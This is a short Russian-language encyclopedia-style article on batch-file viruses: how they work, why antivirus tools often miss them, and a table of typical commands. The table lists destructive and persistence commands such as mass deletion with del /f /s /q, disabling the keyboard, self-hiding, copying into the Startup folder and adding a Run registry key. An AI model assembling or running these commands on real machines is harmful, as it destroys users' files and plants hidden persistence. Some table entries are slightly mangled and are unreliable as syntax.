# Пакетный вирус
Пакетный вирус — вид вредоносной программы, написанной в виде пакетного файла.
Данный тип вируса опасен тем, что его легко создать даже тем кто не владеет полноценным программированием, команды для пакетных файлов достаточно простые, их можно найти в открытом доступе, а создать такой файл можно в системном приложении «Блокнот». Также его не всегда определяют антивирусные программы.

## Принцип работы
Пакетный вирус — это последовательность команд (которая может причинить вред владельцу компьютера), для командного интерпретатора операционной системы, выполненная в виде пакетного файла. Пакетный файл представляет собой обычный текстовый файл, но, в отличие от последнего, имеет расширение .bat, .cmd, или .btm. Пакетные файлы используются для автоматизации различный действий, например, в процессе установки программ или другой рутинной работы.

## Распознание
Антивирусные программы не всегда определяют пакетные вирусы как вредоносные программы, лишь иногда их идентифицируя как «трояны» или программы-шутки.

## Команды вируса
Обычно первая команда в таком файле:  @echo off  полностью безвредна, но отключает режим вывода команд из пакетного файла на экран, чтобы человек не увидел те команды, которые будут выполняться.
Примеры некоторых команд, характерных для пакетного вируса:
| Команда | Значение                                                                                            |
| --- | --------------------------------------------------------------------------------------------------- |
| del %0 | Самоудаление вируса                                                                                 |
| /q | Маркер выполнения команды без разрешения пользователя                                               |
| attrib +h D:*.* | Установить атрибут «Скрытый» на файлы, находящиеся в D:                                             |
| rundll32 keyboard, disable                                                                                         | Отключить клавиатуру                                                                                |
| del R:\*.*** /f /s /q                                                                                              | Автоматическое удаление всех файлов с расширением из трех знаков на диске R без запроса на удаление |
| date 29.07.36 | Сменить дату на 29.07.2036                                                                          |
| rundll32 user,SwapMouseButton                                                                                      | Смена кнопок мыши местами                                                                           |
| del /s /q *.png | Удаляет все фотографии (Только .png)                                                                |
| md 1 | Создаст папку на диске под названием 1                                                              |
| copy %0 C:\1.bat                                                                                                   | Копирует вирус в C:\ и переименовывает его на 1.bat                                                 |
| copy %0 %~USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup                               | Добавляет файл virus.bat в автозагрузку OC                                                          |
| attrib +h %0 | Скрывает себя                                                                                       |
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus" /t REG_SZ /d "Местоположение virus.bat" /f | Добавляет virus.bat в реестр                                                                        |
| :return echo TEST goto return                                                                                      | Выполняет бесконечность раз команду "echo TEST"                                                     |